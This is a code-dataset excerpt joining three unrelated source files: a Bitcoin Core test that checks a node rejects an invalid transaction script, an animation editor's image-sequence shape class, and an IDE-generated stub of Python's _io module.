# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import ComparisonTestFramework
from test_framework.comptool import TestManager, TestInstance, RejectResult
from test_framework.blocktools import *
import time
'''
In this test we connect to one node over p2p, and test tx requests.
'''
# Use the ComparisonTestFramework with 1 node: only use --testbinary.
class InvalidTxRequestTest(ComparisonTestFramework):

    ''' Can either run this test as 1 node with expected answers, or two and compare them.
        Change the "outcome" variable from each TestInstance object to only do the comparison. '''

    def __init__(self):
        super().__init__()
        # A single node is enough: outcomes are checked against the
        # expected answers baked into the TestInstances below.
        self.num_nodes = 1

    def run_test(self):
        test = TestManager(self, self.options.tmpdir)
        test.add_all_connections(self.nodes)
        # tip/block_time are initialised lazily in get_tests().
        self.tip = None
        self.block_time = None
        NetworkThread().start()  # Start up network handling in another thread
        test.run()

    def get_tests(self):
        # Generator consumed by TestManager: each yielded TestInstance is
        # a batch of (block-or-tx, expected outcome) pairs.
        if self.tip is None:
            self.tip = int("0x" + self.nodes[0].getbestblockhash(), 0)
        self.block_time = int(time.time())+1

        '''
        Create a new block with an anyone-can-spend coinbase
        '''
        height = 1
        block = create_block(self.tip, create_coinbase(height), self.block_time)
        self.block_time += 1
        block.solve()
        # Save the coinbase for later
        self.block1 = block
        self.tip = block.sha256
        height += 1
        yield TestInstance([[block, True]])

        '''
        Now we need that block to mature so we can spend the coinbase.
        '''
        # Mine 100 blocks on top so block1's coinbase becomes spendable.
        test = TestInstance(sync_every_block=False)
        for i in range(100):
            block = create_block(self.tip, create_coinbase(height), self.block_time)
            block.solve()
            self.tip = block.sha256
            self.block_time += 1
            test.blocks_and_transactions.append([block, True])
            height += 1
        yield test

        # b'\x64' is OP_NOTIF
        # Transaction will be rejected with code 16 (REJECT_INVALID)
        tx1 = create_transaction(self.block1.vtx[0], 0, b'\x64', 50 * COIN - 1200000)
        yield TestInstance([[tx1, RejectResult(16, b'mandatory-script-verify-flag-failed')]])

        # TODO: test further transactions...
if __name__ == '__main__':
    # Allow running this test directly from the command line.
    InvalidTxRequestTest().main()
| mit |
sujoykroy/motion-picture | editor/MotionPicture/shapes/image_seq_shape.py | 1 | 2120 | from ..commons import *
from .image_shape import ImageShape
import os
from .. import settings as Settings
class ImageSeqShape(ImageShape):
    """An ImageShape that displays one frame of an image sequence.

    The frames are the (sorted) files of a folder; `progress` in [0, 1)
    selects which file is currently shown.
    """
    TYPE_NAME = "ImageSeq"

    def __init__(self, anchor_at, border_color, border_width, fill_color, width, height, corner_radius):
        super(ImageSeqShape, self).__init__(
            anchor_at, border_color, border_width,
            fill_color, width, height, corner_radius)
        # Folder holding the frame files; resolved via Settings.Directory.
        self.image_folder = None
        # Playback position in [0, 1).
        self.progress = 0.

    def copy(self, copy_name=False, deep_copy=False):
        """Return a copy of this shape sharing the same image folder."""
        newob = ImageSeqShape(
            self.anchor_at.copy(), copy_value(self.border_color), self.border_width,
            copy_value(self.fill_color), self.width, self.height, self.corner_radius)
        self.copy_into(newob, copy_name)
        newob.set_image_folder(self.image_folder)
        newob.alpha = self.alpha
        return newob

    def get_xml_element(self):
        """Serialize to XML, storing the folder instead of a single path."""
        elm = super(ImageSeqShape, self).get_xml_element()
        # The base class stores a single image path; this shape is driven
        # by (folder, progress) instead.
        del elm.attrib["image_path"]
        elm.attrib["image_folder"] = self.image_folder
        elm.attrib["alpha"] = "{0}".format(self.alpha)
        elm.attrib["progress"] = "{0}".format(self.progress)
        return elm

    @classmethod
    def create_from_xml_element(cls, elm):
        """Rebuild a shape from the XML written by get_xml_element()."""
        shape = super(ImageSeqShape, cls).create_from_xml_element(elm)
        shape.alpha = float(elm.attrib.get("alpha", 1.))
        shape.progress = float(elm.attrib.get("progress", 0.))
        shape.set_image_folder(elm.attrib.get("image_folder", ""))
        return shape

    def set_image_folder(self, value):
        self.image_folder = value
        # Re-resolve the current frame against the new folder.
        self.set_progress(self.progress)

    def set_progress(self, value):
        """Set playback progress and load the corresponding frame."""
        if value < 0:
            value = 0
        # Wrap into [0, 1) so the sequence cycles (1.0 maps back to 0.0).
        value %= 1.0
        self.progress = value
        image_folder = Settings.Directory.get_full_path(self.image_folder)
        if os.path.isdir(image_folder):
            files = sorted(os.listdir(image_folder))
            if not files:
                # Empty folder: nothing to display.  Previously this fell
                # through to files[0] and raised IndexError.
                return
            # progress < 1.0 keeps the index below len(files); clamp
            # defensively anyway against float rounding.
            index = min(int(len(files) * self.progress), len(files) - 1)
            self.set_image_path(os.path.join(image_folder, files[index]))
| gpl-3.0 |
mglukhikh/intellij-community | python/testData/MockSdk3.2/python_stubs/_io.py | 64 | 45316 | # encoding: utf-8
# module _io calls itself io
# from (built-in)
# by generator 1.125
"""
The io module provides the Python interfaces to stream handling. The
builtin open function is defined in this module.
At the top of the I/O hierarchy is the abstract base class IOBase. It
defines the basic interface to a stream. Note, however, that there is no
seperation between reading and writing to streams; implementations are
allowed to throw an IOError if they do not support a given operation.
Extending IOBase is RawIOBase which deals simply with the reading and
writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide
an interface to OS files.
BufferedIOBase deals with buffering on a raw byte stream (RawIOBase). Its
subclasses, BufferedWriter, BufferedReader, and BufferedRWPair buffer
streams that are readable, writable, and both respectively.
BufferedRandom provides a buffered interface to random access
streams. BytesIO is a simple stream of in-memory bytes.
Another IOBase subclass, TextIOBase, deals with the encoding and decoding
of streams into text. TextIOWrapper, which extends it, is a buffered text
interface to a buffered raw stream (`BufferedIOBase`). Finally, StringIO
is a in-memory stream for text.
Argument names are not part of the specification, and only the arguments
of open() are intended to be used as keyword arguments.
data:
DEFAULT_BUFFER_SIZE
An int containing the default buffer size used by the module's buffered
I/O classes. open() uses the file's blksize (as obtained by os.stat) if
possible.
"""
# no imports
# Variables with simple values
DEFAULT_BUFFER_SIZE = 8192
# functions
def open(name, mode=None, buffering=None):  # known case of _io.open
    """
    open(file, mode='r', buffering=-1, encoding=None,
         errors=None, newline=None, closefd=True) -> file object

    Open file and return a stream.  Raise IOError upon failure.

    file is either a text or byte string giving the name (and the path
    if the file isn't in the current working directory) of the file to
    be opened or an integer file descriptor of the file to be
    wrapped. (If a file descriptor is given, it is closed when the
    returned I/O object is closed, unless closefd is set to False.)

    mode is an optional string that specifies the mode in which the file
    is opened. It defaults to 'r' which means open for reading in text
    mode.  Other common values are 'w' for writing (truncating the file if
    it already exists), and 'a' for appending (which on some Unix systems,
    means that all writes append to the end of the file regardless of the
    current seek position). In text mode, if encoding is not specified the
    encoding used is platform dependent. (For reading and writing raw
    bytes use binary mode and leave encoding unspecified.) The available
    modes are:

    ========= ===============================================================
    Character Meaning
    --------- ---------------------------------------------------------------
    'r'       open for reading (default)
    'w'       open for writing, truncating the file first
    'a'       open for writing, appending to the end of the file if it exists
    'b'       binary mode
    't'       text mode (default)
    '+'       open a disk file for updating (reading and writing)
    'U'       universal newline mode (for backwards compatibility; unneeded
              for new code)
    ========= ===============================================================

    The default mode is 'rt' (open for reading text). For binary random
    access, the mode 'w+b' opens and truncates the file to 0 bytes, while
    'r+b' opens the file without truncation.

    Python distinguishes between files opened in binary and text modes,
    even when the underlying operating system doesn't. Files opened in
    binary mode (appending 'b' to the mode argument) return contents as
    bytes objects without any decoding. In text mode (the default, or when
    't' is appended to the mode argument), the contents of the file are
    returned as strings, the bytes having been first decoded using a
    platform-dependent encoding or using the specified encoding if given.

    buffering is an optional integer used to set the buffering policy.
    Pass 0 to switch buffering off (only allowed in binary mode), 1 to select
    line buffering (only usable in text mode), and an integer > 1 to indicate
    the size of a fixed-size chunk buffer.  When no buffering argument is
    given, the default buffering policy works as follows:

    * Binary files are buffered in fixed-size chunks; the size of the buffer
      is chosen using a heuristic trying to determine the underlying device's
      "block size" and falling back on `io.DEFAULT_BUFFER_SIZE`.
      On many systems, the buffer will typically be 4096 or 8192 bytes long.

    * "Interactive" text files (files for which isatty() returns True)
      use line buffering.  Other text files use the policy described above
      for binary files.

    encoding is the name of the encoding used to decode or encode the
    file. This should only be used in text mode. The default encoding is
    platform dependent, but any encoding supported by Python can be
    passed.  See the codecs module for the list of supported encodings.

    errors is an optional string that specifies how encoding errors are to
    be handled---this argument should not be used in binary mode. Pass
    'strict' to raise a ValueError exception if there is an encoding error
    (the default of None has the same effect), or pass 'ignore' to ignore
    errors. (Note that ignoring encoding errors can lead to data loss.)
    See the documentation for codecs.register for a list of the permitted
    encoding error strings.

    newline controls how universal newlines works (it only applies to text
    mode). It can be None, '', '\\n', '\\r', and '\\r\\n'.  It works as
    follows:

    * On input, if newline is None, universal newlines mode is
      enabled. Lines in the input can end in '\\n', '\\r', or '\\r\\n', and
      these are translated into '\\n' before being returned to the
      caller. If it is '', universal newline mode is enabled, but line
      endings are returned to the caller untranslated. If it has any of
      the other legal values, input lines are only terminated by the given
      string, and the line ending is returned to the caller untranslated.

    * On output, if newline is None, any '\\n' characters written are
      translated to the system default line separator, os.linesep. If
      newline is '', no translation takes place. If newline is any of the
      other legal values, any '\\n' characters written are translated to
      the given string.

    If closefd is False, the underlying file descriptor will be kept open
    when the file is closed. This does not work when a file name is given
    and must be True in that case.

    open() returns a file object whose type depends on the mode, and
    through which the standard file operations such as reading and writing
    are performed. When open() is used to open a file in a text mode ('w',
    'r', 'wt', 'rt', etc.), it returns a TextIOWrapper. When used to open
    a file in a binary mode, the returned class varies: in read binary
    mode, it returns a BufferedReader; in write binary and append binary
    modes, it returns a BufferedWriter, and in read/write mode, it returns
    a BufferedRandom.

    It is also possible to use a string or bytearray as a file for both
    reading and writing. For strings StringIO can be used like a file
    opened in a text mode, and for bytes a BytesIO can be used like a file
    opened in a binary mode.
    """
    # NOTE(review): generated stub body -- `file` is a Python 2 builtin and
    # does not exist on Python 3.  This call is never executed; it exists
    # only to hint a file-like return type to the IDE's type inference.
    return file('/dev/null')
# classes
class BlockingIOError(IOError):
    """ Exception raised when I/O would block on a non-blocking I/O stream """

    def __init__(self, *args, **kwargs):  # real signature unknown
        pass

    # Generated stub attribute: the real object exposes the number of
    # bytes written before the stream blocked.
    characters_written = property(lambda self: object())  # default
class _IOBase(object):
    """
    The abstract base class for all I/O classes, acting on streams of
    bytes. There is no public constructor.

    This class provides dummy implementations for many methods that
    derived classes can override selectively; the default implementations
    represent a file that cannot be read, written or seeked.

    Even though IOBase does not declare read, readinto, or write because
    their signatures will vary, implementations and clients should
    consider those methods part of the interface. Also, implementations
    may raise UnsupportedOperation when operations they do not support are
    called.

    The basic type used for binary data read from or written to a file is
    bytes. bytearrays are accepted too, and in some cases (such as
    readinto) needed. Text I/O classes work with str data.

    Note that calling any method (even inquiries) on a closed stream is
    undefined. Implementations may raise IOError in this case.

    IOBase (and its subclasses) support the iterator protocol, meaning
    that an IOBase object can be iterated over yielding the lines in a
    stream.

    IOBase also supports the :keyword:`with` statement. In this example,
    fp is closed after the suite of the with statement is complete:

    with open('spam.txt', 'r') as fp:
        fp.write('Spam and eggs!')
    """
    # All method bodies below are placeholders emitted by the stub
    # generator; the real implementations live in the C `_io` module.

    def close(self, *args, **kwargs):  # real signature unknown
        """
        Flush and close the IO object.

        This method has no effect if the file is already closed.
        """
        pass

    def fileno(self, *args, **kwargs):  # real signature unknown
        """
        Returns underlying file descriptor if one exists.

        An IOError is raised if the IO object does not use a file descriptor.
        """
        pass

    def flush(self, *args, **kwargs):  # real signature unknown
        """
        Flush write buffers, if applicable.

        This is not implemented for read-only and non-blocking streams.
        """
        pass

    def isatty(self, *args, **kwargs):  # real signature unknown
        """
        Return whether this is an 'interactive' stream.

        Return False if it can't be determined.
        """
        pass

    def readable(self, *args, **kwargs):  # real signature unknown
        """
        Return whether object was opened for reading.

        If False, read() will raise UnsupportedOperation.
        """
        pass

    def readline(self, *args, **kwargs):  # real signature unknown
        """
        Read and return a line from the stream.

        If limit is specified, at most limit bytes will be read.

        The line terminator is always b'\\n' for binary files; for text
        files, the newlines argument to open can be used to select the line
        terminator(s) recognized.
        """
        pass

    def readlines(self, *args, **kwargs):  # real signature unknown
        """
        Return a list of lines from the stream.

        hint can be specified to control the number of lines read: no more
        lines will be read if the total size (in bytes/characters) of all
        lines so far exceeds hint.
        """
        pass

    def seek(self, *args, **kwargs):  # real signature unknown
        """
        Change stream position.

        Change the stream position to byte offset offset. offset is
        interpreted relative to the position indicated by whence.  Values
        for whence are:

        * 0 -- start of stream (the default); offset should be zero or positive
        * 1 -- current stream position; offset may be negative
        * 2 -- end of stream; offset is usually negative

        Return the new absolute position.
        """
        pass

    def seekable(self, *args, **kwargs):  # real signature unknown
        """
        Return whether object supports random access.

        If False, seek(), tell() and truncate() will raise UnsupportedOperation.
        This method may need to do a test seek().
        """
        pass

    def tell(self, *args, **kwargs):  # real signature unknown
        """ Return current stream position. """
        pass

    def truncate(self, *args, **kwargs):  # real signature unknown
        """
        Truncate file to size bytes.

        File pointer is left unchanged.  Size defaults to the current IO
        position as reported by tell().  Returns the new size.
        """
        pass

    def writable(self, *args, **kwargs):  # real signature unknown
        """
        Return whether object was opened for writing.

        If False, write() will raise UnsupportedOperation.
        """
        pass

    def writelines(self, *args, **kwargs):  # real signature unknown
        pass

    def _checkClosed(self, *args, **kwargs):  # real signature unknown
        pass

    def _checkReadable(self, *args, **kwargs):  # real signature unknown
        pass

    def _checkSeekable(self, *args, **kwargs):  # real signature unknown
        pass

    def _checkWritable(self, *args, **kwargs):  # real signature unknown
        pass

    def __enter__(self, *args, **kwargs):  # real signature unknown
        pass

    def __exit__(self, *args, **kwargs):  # real signature unknown
        pass

    def __init__(self, *args, **kwargs):  # real signature unknown
        pass

    def __iter__(self):  # real signature unknown; restored from __doc__
        """ x.__iter__() <==> iter(x) """
        pass

    @staticmethod  # known case of __new__
    def __new__(S, *more):  # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass

    def __next__(self):  # real signature unknown; restored from __doc__
        """ x.__next__() <==> next(x) """
        pass

    closed = property(lambda self: object())  # default
class _BufferedIOBase(_IOBase):
    """
    Base class for buffered IO objects.

    The main difference with RawIOBase is that the read() method
    supports omitting the size argument, and does not have a default
    implementation that defers to readinto().

    In addition, read(), readinto() and write() may raise
    BlockingIOError if the underlying raw stream is in non-blocking
    mode and not ready; unlike their raw counterparts, they will never
    return None.

    A typical implementation should not inherit from a RawIOBase
    implementation, but wrap one.
    """
    # Method bodies below are placeholders emitted by the stub generator.

    def detach(self, *args, **kwargs):  # real signature unknown
        """
        Disconnect this buffer from its underlying raw stream and return it.

        After the raw stream has been detached, the buffer is in an unusable
        state.
        """
        pass

    def read(self, *args, **kwargs):  # real signature unknown
        """
        Read and return up to n bytes.

        If the argument is omitted, None, or negative, reads and
        returns all data until EOF.

        If the argument is positive, and the underlying raw stream is
        not 'interactive', multiple raw reads may be issued to satisfy
        the byte count (unless EOF is reached first).  But for
        interactive raw streams (as well as sockets and pipes), at most
        one raw read will be issued, and a short result does not imply
        that EOF is imminent.

        Returns an empty bytes object on EOF.

        Returns None if the underlying raw stream was open in non-blocking
        mode and no data is available at the moment.
        """
        pass

    def read1(self, *args, **kwargs):  # real signature unknown
        """
        Read and return up to n bytes, with at most one read() call
        to the underlying raw stream. A short result does not imply
        that EOF is imminent.

        Returns an empty bytes object on EOF.
        """
        pass

    def readinto(self, *args, **kwargs):  # real signature unknown
        pass

    def write(self, *args, **kwargs):  # real signature unknown
        """
        Write the given buffer to the IO stream.

        Returns the number of bytes written, which is never less than
        len(b).

        Raises BlockingIOError if the buffer is full and the
        underlying raw stream cannot accept more data at the moment.
        """
        pass

    def __init__(self, *args, **kwargs):  # real signature unknown
        pass
class BufferedRandom(_BufferedIOBase):
    """
    A buffered interface to random access streams.

    The constructor creates a reader and writer for a seekable stream,
    raw, given in the first argument. If the buffer_size is omitted it
    defaults to DEFAULT_BUFFER_SIZE. max_buffer_size isn't used anymore.
    """
    # All method bodies below are placeholders emitted by the stub
    # generator; the real implementations live in the C `_io` module.

    def close(self, *args, **kwargs):  # real signature unknown
        pass

    def detach(self, *args, **kwargs):  # real signature unknown
        pass

    def fileno(self, *args, **kwargs):  # real signature unknown
        pass

    def flush(self, *args, **kwargs):  # real signature unknown
        pass

    def isatty(self, *args, **kwargs):  # real signature unknown
        pass

    def peek(self, *args, **kwargs):  # real signature unknown
        pass

    def read(self, *args, **kwargs):  # real signature unknown
        pass

    def read1(self, *args, **kwargs):  # real signature unknown
        pass

    def readable(self, *args, **kwargs):  # real signature unknown
        pass

    def readinto(self, *args, **kwargs):  # real signature unknown
        pass

    def readline(self, *args, **kwargs):  # real signature unknown
        pass

    def seek(self, *args, **kwargs):  # real signature unknown
        pass

    def seekable(self, *args, **kwargs):  # real signature unknown
        pass

    def tell(self, *args, **kwargs):  # real signature unknown
        pass

    def truncate(self, *args, **kwargs):  # real signature unknown
        pass

    def writable(self, *args, **kwargs):  # real signature unknown
        pass

    def write(self, *args, **kwargs):  # real signature unknown
        pass

    def _dealloc_warn(self, *args, **kwargs):  # real signature unknown
        pass

    def __getstate__(self, *args, **kwargs):  # real signature unknown
        pass

    def __init__(self, *args, **kwargs):  # real signature unknown
        pass

    @staticmethod  # known case of __new__
    def __new__(S, *more):  # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass

    def __next__(self):  # real signature unknown; restored from __doc__
        """ x.__next__() <==> next(x) """
        pass

    def __repr__(self):  # real signature unknown; restored from __doc__
        """ x.__repr__() <==> repr(x) """
        pass

    closed = property(lambda self: object())  # default
    mode = property(lambda self: object())  # default
    name = property(lambda self: object())  # default
    raw = property(lambda self: object())  # default
class BufferedReader(_BufferedIOBase):
""" Create a new buffered reader using the given readable raw IO object. """
def close(self, *args, **kwargs): # real signature unknown
pass
def detach(self, *args, **kwargs): # real signature unknown
pass
def fileno(self, *args, **kwargs): # real signature unknown
pass
def flush(self, *args, **kwargs): # real signature unknown
pass
def isatty(self, *args, **kwargs): # real signature unknown
pass
def peek(self, *args, **kwargs): # real signature unknown
pass
def read(self, *args, **kwargs): # real signature unknown
pass
def read1(self, *args, **kwargs): # real signature unknown
pass
def readable(self, *args, **kwargs): # real signature unknown
pass
def readline(self, *args, **kwargs): # real signature unknown
pass
def seek(self, *args, **kwargs): # real signature unknown
pass
def seekable(self, *args, **kwargs): # real signature unknown
pass
def tell(self, *args, **kwargs): # real signature unknown
pass
def truncate(self, *args, **kwargs): # real signature unknown
pass
def writable(self, *args, **kwargs): # real signature unknown
pass
def _dealloc_warn(self, *args, **kwargs): # real signature unknown
pass
def __getstate__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __next__(self): # real signature unknown; restored from __doc__
""" x.__next__() <==> next(x) """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
closed = property(lambda self: object()) # default
mode = property(lambda self: object()) # default
name = property(lambda self: object()) # default
raw = property(lambda self: object()) # default
class BufferedRWPair(_BufferedIOBase):
"""
A buffered reader and writer object together.
A buffered reader object and buffered writer object put together to
form a sequential IO object that can read and write. This is typically
used with a socket or two-way pipe.
reader and writer are RawIOBase objects that are readable and
writeable respectively. If the buffer_size is omitted it defaults to
DEFAULT_BUFFER_SIZE.
"""
def close(self, *args, **kwargs): # real signature unknown
pass
def flush(self, *args, **kwargs): # real signature unknown
pass
def isatty(self, *args, **kwargs): # real signature unknown
pass
def peek(self, *args, **kwargs): # real signature unknown
pass
def read(self, *args, **kwargs): # real signature unknown
pass
def read1(self, *args, **kwargs): # real signature unknown
pass
def readable(self, *args, **kwargs): # real signature unknown
pass
def readinto(self, *args, **kwargs): # real signature unknown
pass
def writable(self, *args, **kwargs): # real signature unknown
pass
def write(self, *args, **kwargs): # real signature unknown
pass
def __getstate__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
closed = property(lambda self: object()) # default
class BufferedWriter(_BufferedIOBase):
"""
A buffer for a writeable sequential RawIO object.
The constructor creates a BufferedWriter for the given writeable raw
stream. If the buffer_size is not given, it defaults to
DEFAULT_BUFFER_SIZE. max_buffer_size isn't used anymore.
"""
def close(self, *args, **kwargs): # real signature unknown
pass
def detach(self, *args, **kwargs): # real signature unknown
pass
def fileno(self, *args, **kwargs): # real signature unknown
pass
def flush(self, *args, **kwargs): # real signature unknown
pass
def isatty(self, *args, **kwargs): # real signature unknown
pass
def readable(self, *args, **kwargs): # real signature unknown
pass
def seek(self, *args, **kwargs): # real signature unknown
pass
def seekable(self, *args, **kwargs): # real signature unknown
pass
def tell(self, *args, **kwargs): # real signature unknown
pass
def truncate(self, *args, **kwargs): # real signature unknown
pass
def writable(self, *args, **kwargs): # real signature unknown
pass
def write(self, *args, **kwargs): # real signature unknown
pass
def _dealloc_warn(self, *args, **kwargs): # real signature unknown
pass
def __getstate__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
closed = property(lambda self: object()) # default
mode = property(lambda self: object()) # default
name = property(lambda self: object()) # default
raw = property(lambda self: object()) # default
class BytesIO(_BufferedIOBase):
"""
BytesIO([buffer]) -> object
Create a buffered I/O implementation using an in-memory bytes
buffer, ready for reading and writing.
"""
def close(self): # real signature unknown; restored from __doc__
""" close() -> None. Disable all I/O operations. """
pass
def flush(self): # real signature unknown; restored from __doc__
""" flush() -> None. Does nothing. """
pass
def getbuffer(self): # real signature unknown; restored from __doc__
"""
getbuffer() -> bytes.
Get a read-write view over the contents of the BytesIO object.
"""
pass
def getvalue(self): # real signature unknown; restored from __doc__
"""
getvalue() -> bytes.
Retrieve the entire contents of the BytesIO object.
"""
pass
def isatty(self): # real signature unknown; restored from __doc__
"""
isatty() -> False.
Always returns False since BytesIO objects are not connected
to a tty-like device.
"""
pass
def read(self, size=None): # real signature unknown; restored from __doc__
"""
read([size]) -> read at most size bytes, returned as a string.
If the size argument is negative, read until EOF is reached.
Return an empty string at EOF.
"""
pass
def read1(self, size): # real signature unknown; restored from __doc__
"""
read1(size) -> read at most size bytes, returned as a string.
If the size argument is negative or omitted, read until EOF is reached.
Return an empty string at EOF.
"""
pass
def readable(self, *args, **kwargs): # real signature unknown
pass
def readinto(self, bytearray): # real signature unknown; restored from __doc__
"""
readinto(bytearray) -> int. Read up to len(b) bytes into b.
Returns number of bytes read (0 for EOF), or None if the object
is set not to block as has no data to read.
"""
pass
def readline(self, size=None): # real signature unknown; restored from __doc__
"""
readline([size]) -> next line from the file, as a string.
Retain newline. A non-negative size argument limits the maximum
number of bytes to return (an incomplete line may be returned then).
Return an empty string at EOF.
"""
pass
def readlines(self, size=None): # real signature unknown; restored from __doc__
"""
readlines([size]) -> list of strings, each a line from the file.
Call readline() repeatedly and return a list of the lines so read.
The optional size argument, if given, is an approximate bound on the
total number of bytes in the lines returned.
"""
return []
def seek(self, pos, whence=0): # real signature unknown; restored from __doc__
"""
seek(pos, whence=0) -> int. Change stream position.
Seek to byte offset pos relative to position indicated by whence:
0 Start of stream (the default). pos should be >= 0;
1 Current position - pos may be negative;
2 End of stream - pos usually negative.
Returns the new absolute position.
"""
pass
def seekable(self, *args, **kwargs): # real signature unknown
pass
def tell(self): # real signature unknown; restored from __doc__
""" tell() -> current file position, an integer """
pass
def truncate(self, size=None): # real signature unknown; restored from __doc__
"""
truncate([size]) -> int. Truncate the file to at most size bytes.
Size defaults to the current file position, as returned by tell().
The current file position is unchanged. Returns the new size.
"""
pass
def writable(self, *args, **kwargs): # real signature unknown
pass
def write(self, bytes): # real signature unknown; restored from __doc__
"""
write(bytes) -> int. Write bytes to file.
Return the number of bytes written.
"""
pass
def writelines(self, sequence_of_strings): # real signature unknown; restored from __doc__
"""
writelines(sequence_of_strings) -> None. Write strings to the file.
Note that newlines are not added. The sequence can be any iterable
object producing strings. This is equivalent to calling write() for
each string.
"""
pass
def __getstate__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, buffer=None): # real signature unknown; restored from __doc__
pass
def __iter__(self): # real signature unknown; restored from __doc__
""" x.__iter__() <==> iter(x) """
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __next__(self): # real signature unknown; restored from __doc__
""" x.__next__() <==> next(x) """
pass
def __setstate__(self, *args, **kwargs): # real signature unknown
pass
closed = property(lambda self: object()) # default
class _RawIOBase(_IOBase):
""" Base class for raw binary I/O. """
def read(self, *args, **kwargs): # real signature unknown
pass
def readall(self, *args, **kwargs): # real signature unknown
""" Read until EOF, using multiple read() call. """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
class FileIO(_RawIOBase):
"""
file(name: str[, mode: str]) -> file IO object
Open a file. The mode can be 'r', 'w' or 'a' for reading (default),
writing or appending. The file will be created if it doesn't exist
when opened for writing or appending; it will be truncated when
opened for writing. Add a '+' to the mode to allow simultaneous
reading and writing.
"""
def close(self): # real signature unknown; restored from __doc__
"""
close() -> None. Close the file.
A closed file cannot be used for further I/O operations. close() may be
called more than once without error. Changes the fileno to -1.
"""
pass
def fileno(self): # real signature unknown; restored from __doc__
"""
fileno() -> int. "file descriptor".
This is needed for lower-level file interfaces, such the fcntl module.
"""
pass
def isatty(self): # real signature unknown; restored from __doc__
""" isatty() -> bool. True if the file is connected to a tty device. """
pass
def read(self, size=-1): # known case of _io.FileIO.read
"""
read(size: int) -> bytes. read at most size bytes, returned as bytes.
Only makes one system call, so less data may be returned than requested
In non-blocking mode, returns None if no data is available.
On end-of-file, returns ''.
"""
return ""
def readable(self): # real signature unknown; restored from __doc__
""" readable() -> bool. True if file was opened in a read mode. """
pass
def readall(self): # real signature unknown; restored from __doc__
"""
readall() -> bytes. read all data from the file, returned as bytes.
In non-blocking mode, returns as much as is immediately available,
or None if no data is available. On end-of-file, returns ''.
"""
pass
def readinto(self): # real signature unknown; restored from __doc__
""" readinto() -> Same as RawIOBase.readinto(). """
pass
def seek(self, offset, whence=None): # real signature unknown; restored from __doc__
"""
seek(offset: int[, whence: int]) -> None. Move to new file position.
Argument offset is a byte count. Optional argument whence defaults to
0 (offset from start of file, offset should be >= 0); other values are 1
(move relative to current position, positive or negative), and 2 (move
relative to end of file, usually negative, although many platforms allow
seeking beyond the end of a file).
Note that not all file objects are seekable.
"""
pass
def seekable(self): # real signature unknown; restored from __doc__
""" seekable() -> bool. True if file supports random-access. """
pass
def tell(self): # real signature unknown; restored from __doc__
""" tell() -> int. Current file position """
pass
def truncate(self, size=None): # real signature unknown; restored from __doc__
"""
truncate([size: int]) -> None. Truncate the file to at most size bytes.
Size defaults to the current file position, as returned by tell().The current file position is changed to the value of size.
"""
pass
def writable(self): # real signature unknown; restored from __doc__
""" writable() -> bool. True if file was opened in a write mode. """
pass
def write(self, b): # real signature unknown; restored from __doc__
"""
write(b: bytes) -> int. Write bytes b to file, return number written.
Only makes one system call, so not all of the data may be written.
The number of bytes actually written is returned.
"""
pass
def _dealloc_warn(self, *args, **kwargs): # real signature unknown
pass
def __getattribute__(self, name): # real signature unknown; restored from __doc__
""" x.__getattribute__('name') <==> x.name """
pass
def __getstate__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
closed = property(lambda self: object()) # default
closefd = property(lambda self: object()) # default
mode = property(lambda self: object()) # default
class IncrementalNewlineDecoder(object):
"""
Codec used when reading a file in universal newlines mode. It wraps
another incremental decoder, translating \r\n and \r into \n. It also
records the types of newlines encountered. When used with
translate=False, it ensures that the newline sequence is returned in
one piece. When used with decoder=None, it expects unicode strings as
decode input and translates newlines without first invoking an external
decoder.
"""
def decode(self, *args, **kwargs): # real signature unknown
pass
def getstate(self, *args, **kwargs): # real signature unknown
pass
def reset(self, *args, **kwargs): # real signature unknown
pass
def setstate(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
newlines = property(lambda self: object()) # default
class _TextIOBase(_IOBase):
"""
Base class for text I/O.
This class provides a character and line based interface to stream
I/O. There is no readinto method because Python's character strings
are immutable. There is no public constructor.
"""
def detach(self, *args, **kwargs): # real signature unknown
"""
Separate the underlying buffer from the TextIOBase and return it.
After the underlying buffer has been detached, the TextIO is in an
unusable state.
"""
pass
def read(self, *args, **kwargs): # real signature unknown
"""
Read at most n characters from stream.
Read from underlying buffer until we have n characters or we hit EOF.
If n is negative or omitted, read until EOF.
"""
pass
def readline(self, *args, **kwargs): # real signature unknown
"""
Read until newline or EOF.
Returns an empty string if EOF is hit immediately.
"""
pass
def write(self, *args, **kwargs): # real signature unknown
"""
Write string to stream.
Returns the number of characters written (which is always equal to
the length of the string).
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
encoding = property(lambda self: object()) # default
errors = property(lambda self: object()) # default
